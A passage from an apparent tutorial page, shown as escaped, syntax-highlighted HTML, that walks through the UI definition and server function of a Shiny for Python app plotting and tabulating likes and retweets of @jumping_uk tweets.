&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# dictionary of choices for checkbox group&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# factors for table of form {&amp;#34;value&amp;#34;: &amp;#34;UI label&amp;#34;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;choices_check &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;created_at&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Date&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;text&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Text&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;retweet_count&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Retweets&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;favorite_count&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Likes&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app_ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page_fluid(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;layout_sidebar(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;panel_sidebar(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# user inputs in the sidebar&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;input_select(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;x&amp;#34;&lt;/span&gt;, label&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;X-axis Variable&amp;#34;&lt;/span&gt;, choices&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;choices_select, selected&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;year&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;input_numeric(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;num&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; label&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;How many tweets do you want to view?&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; min&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; max&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;panel_conditional(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# a client-side condition for whether to display this panel&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;input.num &amp;gt; 0 &amp;amp;&amp;amp; input.num &amp;lt;= 50&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;input_checkbox_group(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;cols&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; label&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Select which variables you want to view:&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; choices&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;choices_check,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; selected&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;([&lt;span style="color:#a5d6ff"&gt;&amp;#34;created_at&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;text&amp;#34;&lt;/span&gt;]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;panel_main(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;output_plot(&lt;span style="color:#a5d6ff"&gt;&amp;#34;plot&amp;#34;&lt;/span&gt;), ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;output_text(&lt;span style="color:#a5d6ff"&gt;&amp;#34;text&amp;#34;&lt;/span&gt;), ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;output_table(&lt;span style="color:#a5d6ff"&gt;&amp;#34;table&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="server-function"&gt;Server Function&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;shiny&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; render
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Our server function will take three arguments: &lt;code&gt;input&lt;/code&gt;, &lt;code&gt;output&lt;/code&gt;, and &lt;code&gt;session&lt;/code&gt;, each of which will be passed to our function when we run the application. The &lt;code&gt;input&lt;/code&gt; parameter gives access to the values bound to the &lt;code&gt;input_X&lt;/code&gt; UI functions by their &lt;code&gt;id&lt;/code&gt;, &lt;code&gt;output&lt;/code&gt; gives us somewhere to direct our content to be rendered and &lt;code&gt;session&lt;/code&gt; contains some data specific to the browser session that is connected to the application.&lt;/p&gt;
&lt;p&gt;When defining outputs within our server function, we want to define a function that matches the &lt;code&gt;id&lt;/code&gt; of its corresponding output function in the UI. We preceed this function with decorators &lt;code&gt;@output&lt;/code&gt; and &lt;code&gt;@render.*&lt;/code&gt;. The render decorator should match the output function it&amp;rsquo;s referring to. For a plot we will use &lt;code&gt;@render.plot&lt;/code&gt;, for a table &lt;code&gt;@render.table&lt;/code&gt; etc. If we want to call an input in our server function, we use &lt;code&gt;input.*&lt;/code&gt;. For example, if we have an input with &lt;code&gt;id = abc&lt;/code&gt;, we would call it with &lt;code&gt;input.abc()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;A full server function with imports might then look like&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# app.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;plotnine&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;gg&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# read data from file&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;jr &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(&lt;span style="color:#a5d6ff"&gt;&amp;#34;jr_shiny.csv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;jr &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; jr&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;astype({&lt;span style="color:#a5d6ff"&gt;&amp;#34;day&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;object&amp;#34;&lt;/span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;server&lt;/span&gt;(input, output, session):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;@output&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;@render.plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;(): &lt;span style="color:#8b949e;font-style:italic"&gt;# function name matches the id=&amp;#34;plot&amp;#34; in the outputs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# access input id=&amp;#34;x&amp;#34; value with input.x()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; avg_int &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; jr&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;groupby(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;x(), as_index&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;False&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;agg(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {&lt;span style="color:#a5d6ff"&gt;&amp;#34;retweet_count&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;mean&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;favorite_count&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;mean&amp;#34;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; avg_int &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;melt(avg_int, id_vars&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;x())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; (
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; gg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ggplot(avg_int, gg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;aes(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;x(), &lt;span style="color:#a5d6ff"&gt;&amp;#34;value&amp;#34;&lt;/span&gt;, fill&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;variable&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; gg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;geom_col(position&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;dodge&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; gg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ylab(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Average Interactions&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; gg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;scale_fill_brewer(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;qual&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; palette&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Dark2&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; name&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Interaction&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; labels&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;([&lt;span style="color:#a5d6ff"&gt;&amp;#34;Like&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Retweet&amp;#34;&lt;/span&gt;]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; gg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;theme_classic()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;x() &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;day&amp;#34;&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; gg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;scale_x_discrete(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; labels&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;([&lt;span style="color:#a5d6ff"&gt;&amp;#34;Mon&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Tue&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Wed&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Thu&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Fri&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Sat&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Sun&amp;#34;&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; plot
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;@output&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;@render.text&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;text&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;cols() &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; () &lt;span style="color:#ff7b72;font-weight:bold"&gt;or&lt;/span&gt; input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;num() &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;or&lt;/span&gt; input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;num() &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;elif&lt;/span&gt; input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;num() &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Displaying the most recent @jumping_uk tweet:&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;f&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Displaying the &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;{&lt;/span&gt;input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;num()&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt; most recent @jumping_uk tweets:&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;@output&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;@render.table&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;table&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; cols &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; jr&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;filter(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;cols())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; cols&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;rename(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; columns&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;created_at&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Date&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;text&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Text&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;retweet_count&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Retweets&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;favorite_count&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Likes&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; inplace&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;set_option(&lt;span style="color:#a5d6ff"&gt;&amp;#34;colheader_justify&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;left&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; first_n &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; cols&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;head(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;num())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;num() &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;or&lt;/span&gt; input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;num() &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;None&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; first_n
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="finishing-touches"&gt;Finishing Touches&lt;/h2&gt;
